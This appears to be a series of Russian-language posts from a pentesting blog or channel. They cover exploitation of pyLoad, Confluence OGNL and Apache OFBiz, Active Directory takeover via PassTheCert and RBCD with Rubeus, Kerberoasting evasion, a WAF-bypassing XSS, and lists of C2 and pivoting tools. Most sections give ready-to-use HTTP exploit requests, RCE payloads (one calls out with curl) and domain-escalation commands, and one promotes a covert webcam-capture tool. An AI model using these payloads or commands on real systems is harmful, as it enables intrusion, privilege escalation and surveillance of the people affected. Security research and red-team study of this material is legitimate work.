Пора решать таски по байпассу IDS на PhD 👍

Занял в итоге 5-ое место и получил небольшой мерч в виде рюкзака и футболки.
Был под ником Barsik ✨

Pre-auth RCE in pyLoad (CVE-2023-0297)

pyLoad - это менеджер загрузки OSS, написанный на Python и управляемый через веб-интерфейс. В нем недавно нашли вулну и зарепортили на бб, связанную с js2py. Кратко это интеграция JS в Python 😁

В функции eval_js(), заметили момент, что параметр jk выполняет JS код. Люди поковырялись и поняли, что туда спокойно можно положить любую команду.

Ну и получилось так

POST /amogus/test HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

jk=pyimport%20os;os.system("touch%20/tmp/pwnd");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaa

Hello from the other side of the world

Собрал небольшой список тулзов, связанные с проксированием трафика. 🚘

Proxychains - без комментариев

GrafTCP - то же самое, что и proxychains, с другим механизмом "проксификации", который позволяет использовать Go.

Chisel - тоже популярный инструмент на Go, однако все же стоит упомянуть о нем. Могут быть проблемы при использовании разных версиях на клиентской или серверной стороне.

Еще другой пользователь писал SharpChisel, который является тем же chisel, но на C# уже, однако замечу, что проект не поддерживается с 2020 года

Shadowsocks-Windows - shadowsocks на C#

Gost - как и chisel, тулза тоже сделана на Go, однако замечу, что помимо стандартной прокси, у вас есть возможность поставить прокси с аутентификацией, multiple-ports, а также сделать как просто forward proxy, так и многоуровневый forward proxy. Thx to riven

Bore - по словам автора, тулза насчитывает около 400 строк безопасного, асинхронного Rust и очень проста в настройке - достаточно запустить один двоичный файл для клиента и сервера. Скажу от себя, что работает достаточно быстро

FRP - опять Go, тут уже позволяет нам использовать какой-то конфиг файл, token/oidc аутентификация, bandwidth лимит, поддержка KCP/QUIC и много чего другого.

GoProxy - хороша для VPS, больше нечего сказать

Mubeng - хороша для ротации IP

Ligolo - простой в использовании. Как написано на гите: «Reverse Tunneling made easy for pentesters, by pentesters»

Pivotnacci - хорошая замена reGeorg, который проксировал HTTP

proxy.py - тоже отличная альтернатива reGeorg

ligolo-ng - вместо SOCKS, создает интерфейс, который также можно использовать для pivoting. Thx to D00Movenok

Если кто-то дополнит, то буду рад 😘

В выпуске «За кулисами Red Team» @Riocool упоминает, что на пентестах помимо скриншотов десктопа бывает сподручно делать снимки с веб-камеры на контролируемой рабочей станции, чтобы убедиться, находится ли юзверь в данный момент за ПеКа, либо же, к примеру, отлучился на свой закономерный обеденный перерыв. Раньше я не прибегал к подобному трюку, однако подсознательно часто испытывал потребность в такого рода проверках, ведь ворваться в GUI-сеанс определенного пользователя временами бывает просто необходимо.

Поискав готовые решения в сети, стало очевидно, что «из коробки» капчурить вебку умеет только дедушка meterpreter, а встраивать поделки на плюсах в свои проекты для выполнения из памяти не всегда удобно. Еще немного погуглив, наткнулся на этот интересный пост на Медиуме, где в параграфе Webcam Capture упоминается некий скрипт MiniEye.ps1 от @xorrior, который якобы уже умеет делать все, что нам нужно (ссылка на скрипт из статьи отдает 404, инструмент переехал в корень репозитория – Get-DXWebcamVideo.ps1). Подход основан на использовании .NET-библиотеки DirectShowNET и обвязки для нее DirectX.Capture, блог автора которой на CodeProject также рекомендую к прочтению:

🗒 DirectX.Capture Class Library

В свободное время было решено переписать Get-DXWebcamVideo.ps1 на фреймворк, чтобы не возиться лишний раз с запуском повершелла. Смержив зависимости с помощью dnMerge, можно получить standalone-сборку, готовую для выполнения из вашего любимого агента C2:

👨‍💻 https://github.com/snovvcrash/SharpDXWebcam

⚠️ Помним, что инструмент предназначен исключительно для образовательных целей и кейсов этичного тестирования на проникновение в рамках контракта, а блэчить плохо!

Всем остальным – happy (ethical) hacking!

Play with Domain via PassTheCert

Часто для захвата домена используется PKINIT, который позволяет получить TGT (или его NT-хэш). Сам же PKINIT представляет из себя механизм для предварительной аутентификации в Kerberos, который использует сертификаты X.509 в аутентификации KDC для клиентов и наоборот (хотя иногда позволяет клиенту получить билет, не выполняя аутентификацию).

Однако, DC не всегда поддерживает PKINIT. Это может быть связано с отсутствием Smart Card Logon. И тут нам уже поможет LDAP, позволяющий аутентифицироваться с помощью клиентского сертификата и выполнять различные действия. Для таких случаев ребята написали тулзу PassTheCert 🎧

PassTheCert позволяет выполнять различные вектора атак

Предоставление пользователю прав DCSync

Модификация атрибута msDS-AllowedToActOnBehalfOfOtherIdentity

Добавление компьютера в домен, что полезно для выполнения RBCD-атак.

Сброс пароля учетной записи. Но без прав User-Force-Change-Password это не сработает

Я рассматривал использование данной тулзы в последнем случае

python3 passthecert.py -dc-ip 10.10.10.X -action modify_user -crt user.crt -key user.key -domain corp.com -target aboba -new-pass

Computer Object Takeover

Завершая играться с AD, нашел достаточно интересный сценарий, связанный с абьюзом Generic

Если в сетке есть пользователь с правами GenericWrite, то возможно зайти с повышенными привилегиями на другой тачке

Данный сценарий возможен, т.к Generic позволяет изменять DACL 🔥


Для этого мы создаем новую учетку тачки. По дефолту параметр ms-DS-MachineAccountQuota позволяет всем пользователям домена добавлять до 10 учетных записей машин

SID в принципе и сами можете вставить, но решил чуть облегчить процесс 🐈

New-MachineAccount -MachineAccount aboba -Password $(ConvertTo-SecureString
'Test@123' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer -Domain dev.domain.local aboba -Properties objectsid | select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDenoscriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc02.domain.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

После этого можно использовать тот же Rubeus, для получения RC4-хэша.

Rubeus.exe hash /user:aboba /password:Test@123 /domain:dev.domain.local

И затем юзаем s4u для повышения своих привилегий за счет получения TGS

Rubeus.exe s4u /user:aboba$ /rc4:4E35B802576F770E77851BAB9D4AE172 /impersonateuser:administrator /msdsspn:cifs/dc02.domain.local /ptt

Для облегчения я юзал PowerMad и PowerView

Bye-bye 🎧

Всем, ку
В этом году, на OFFZONE помогаю с бейджами. Надеюсь, что они работают хорошо и стабильно (хотя проблемы есть у некоторых)✨

Всем хорошо провести мероприятие 😇

OGNL and sandboxes

Существует такая вещь в Java, как Object Graph Notation Language (OGNL) еще один Expression language. Чаще всего данный фреймворк можно заметить в продуктах Apache и Attlasian

OGNL вызывает методы несколько иначе, чем Java, поскольку OGNL интерпретируется и должен выбрать нужный метод во время выполнения программы, не имея никакой дополнительной информации о типе, кроме собственно предоставленных аргументов. OGNL всегда выбирает наиболее специфичный метод, типы которого соответствуют заданным аргументам

Спустя время, выяснилось, что через OGNL можно также сделать Command Injection. Метод эксплуатации чем-то напоминает SSTI 😻

Разберу пару вулн в Confluence. Проблемы появлялись из-за isSafeExpression

При рендеринге странице, есть спрятанный параметр queryString 😑

Именно он дает нам возможность, поиграться с Java

queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022curl your-domain.com\u0022)}%2b\u0027

Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень (не забудь энкодить)👍

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Qualys-Response",#a))}

Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.

Самое банальное - это использовать Class, вместо class. Или использовать конкатенацию строк.

Дальше, один из экспертов решил пойти глубже и начал смотреть Abstract Syntax Tree (AST). Как оказалось, AST давал много векторов, для обхода ограничений

Самое вкусное было найдено в BeanMap, который позволял сделать, уже полноценный байпасс

(#@org.apache.commons.beanutils.BeanMap@\\u007b\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.noscript.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))

Всем удачи 😇

🦊 Про кастомные элементы в DOM

Иногда бывает полезно посмотреть customElements.define() в библиотеках и внутреннем JS-коде. Эта функция регистрирует новые элементы DOM, и WAF свободно пропускает их.

На скрине внизу показан стандартный JS для PyScript, в котором создается элемент <py-noscript>, что приводит к интересному байпасу:

<py-noscript>'\74img/src/onerror\75alert(domain)\76'</py-noscript>

Попробовать самостоятельно можно тут.

#web #xss

Please, provide command…

Когда-то я собирал список инструментов для проксирования трафика. В этот раз я посмотрел некоторые C2 и решил поделиться небольшим списком. 🔥

Sliver - это пожалуй один из самых популярных C2 на данный момент. Он поддерживает различные протоколы, включая HTTP, WireGuard, DNS и т.д. Плюс, был недавно набор статей по его кастомизации 👍

Mythic - как и Sliver, Mythic является достаточно популярным C2, плюс у него очень приятный UI. Для Mythic есть много различных агентов. Ну и никто не мешает написать собственный, а документация у данного инструмента приятная

Merlin - данный C2 популярен за обширность предоставляемых модулей для AD, но только не каждый из них корректно работает. Автор заявлял, что агент можно легко модифицировать под себя, но в пабликах не видел агентов, основанных на нем

Godoh - самый простой C2, однако для коннекта использует протокол DNS-over-HTTPS 🙂

Havoc - очень похож на Cobalt Strike, имеет в себе много различных модулей. Его фичей считают Sleep obfuscation, основанный на Ekko (thx to D00Movenok )

PoshC2 - тулза немного устаревшая, но показалось интересной за счет модулей, основанных на C# (хотя поддерживает еще модули, основанные на Python)

По детекту понравилась статья от ProjectDiscovery

Наверно все 🚶‍♀️

Пока писал, тут выкатили статью по C2C

Мне как-то стало интересно, каким образом фиксируются манипуляции с Kerberos, поэтому решил порыть базовые вещи. Разбираться будем сегодня с TGS

Rubeus.exe kerberoast /nowrap

Мы можем видеть, что он отправляет следующий LDAP запрос

(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

(samAccountType=805306368) - получаем доменных пользователей

(servicePrincipalName=*) - получаем все SPN в домене

(!samAccountName=krbtgt) - убираем из вывода krbtgt

(!(UserAccountControl:1.2.840.113556.1.4.803:=2)) - смотрим, что УЗ не заблокирована.


Тут уже начинается детект у многих. Вся проблема в servicePrincipalNames=*, который SOC ловит, т.к мы получаем список всех SPN. Лучше определить учетные записи с SPN и только потом делать уже запрос

Rubeus.exe kerberoast /nowrap /user:svc_chat /spn:HTTP/sus.monkey.local

Многие знают про некий даунгрейд тикета с AES на RC4. По факту, ничего не мешает сервисной учетке поддерживать RC4 и AES128/256 одновременно, поэтому мы можем запросить, запросить тикет не с AES, а с RC4, поэтому и сбрутать креды будет намного легче. В Rubeus с этим помогает флаг /tgtdeleg. Однако, в идеале тикеты и его содержимое мониторят.

Попробуем немного углубиться в содержимое тикета, если конкретнее то в его флаги. Эти 32-битные флаги называют KDCOptions. Нормальным поведением является, если значение KDCOptions равно 0x40810000, однако при попытке поиграться с тикетами, мы можем заметить другое значение 0x40810010. Если их сравнивать, то можем понять, что нам надо избавиться от Renewable-OK, и с этим уже может помочь тулза Orpheus, которая подправит флаги.

Интересным решением для обнаружения атак является использование фейковых УЗ с SPN, данный момент мне подчеркнул один из моих коллег. Обычно стоит обращать внимание на LastLogon, который может намекнуть на фальшивость УЗ. Ну и наличие высоких привилегий, тоже дает намек

Bye-bye ✨

Пора и мне сказать что-то ✨

В этом году я очень старался повысить свои навыки, а вы могли наблюдать тем, что я балансировал между разными темами в своих постах. С одним автором другого ИБ-канала я общался и обсуждал рынок ИБ, другие авторы меня вдохновляли, направляли и просто показывали свои находки, ресерчи и наработки.

По активностям год был веселый. На PHD, я сидел и тыкал IDS Bypass, помогал в проведении OFFZONE 2023, ну и Standoff 12 тоже не прошел мимо. Надо попробовать быть более активным в следующем году. 🎧

Было хорошо? Не знаю, но думаю, что я нашел курс своего развития, где-то на ближайшие полгода. Под конец года, постов стало меньше, т.к задач по работе было не мало, да и учеба тоже дает знаки о себе.

В завершении скажу, что все молодцы! Пусть каждый отдохнет на праздниках, пусть каждый будет получать удовольствие от своего дела, пусть каждый будет здоровым! ✨

Счастье для всех, даром, и пусть никто не уйдет обиженный!

Oh yes, ping pong

Под конец прошлого года, прошла шумиха с Apache Ofbiz, который позволял сделать байпас аутентификации и проабьюзать XML-RPC. Решил глянуть, что это было и как оно происходит 😺

Суть заключается в том, что XML-RPC, по логике можно использовать только с валидными кредами, но глянем на сам момент аутентификации юзера в LoginWorker.java

       List<String> unpwErrMsgList = new LinkedList<String>();
        if (UtilValidate.isEmpty(username)) {
            unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.username_was_empty_reenter", UtilHttp.getLocale(request)));
        }
        if (UtilValidate.isEmpty(password) && UtilValidate.isEmpty(token)) {
            unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.password_was_empty_reenter", UtilHttp.getLocale(request)));
        }
        boolean requirePasswordChange = "Y".equals(request.getParameter("requirePasswordChange"));
        if (!unpwErrMsgList.isEmpty()) {
            request.setAttribute("_ERROR_MESSAGE_LIST_", unpwErrMsgList);
            return  requirePasswordChange ? "requirePasswordChange" : "error";
        }

Тут все начинается с requirePasswordChange, который не обращает внимание на то, введет ли юзер валидные креды. Если юзер в качестве параметра отдает Y, то метод login(HttpServletRequest request, HttpServletResponse response) вернет строку requirePasswordChange

Дальше идем в checkLogin() и там уже идет следующий момент

if (username == null
                    || (password == null && token == null)
                    || "error".equals(login(request, response)))

Т.е по факту, мы тупо можем обойти проверку, путем вставки любого символа ему, и плюс "error".equals(login(request, response)) не будет срабатывать, т.к мы заставили login(...) вернуть requirePasswordChange

Поэтому мы можем дергать ручки XML-RPC

/webtools/control/ping?USERNAME=&PASSWORD=s&requirePasswordChange=Y

А через серелиализацию, мы передаем наш шелл, который можно сделать через ysoserial

POST /webtools/control/xmlrpc/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Length: 4002
Content-Type: application/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>Methodname</methodName>
  <params>
    <param>
    <value>
      <struct>
        <member>
          <name>test</name>
          <value>
            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">serialized_shell</serializable>
          </value>
        </member>
      </struct>
    </value>
  </param>
</params>
</methodCall>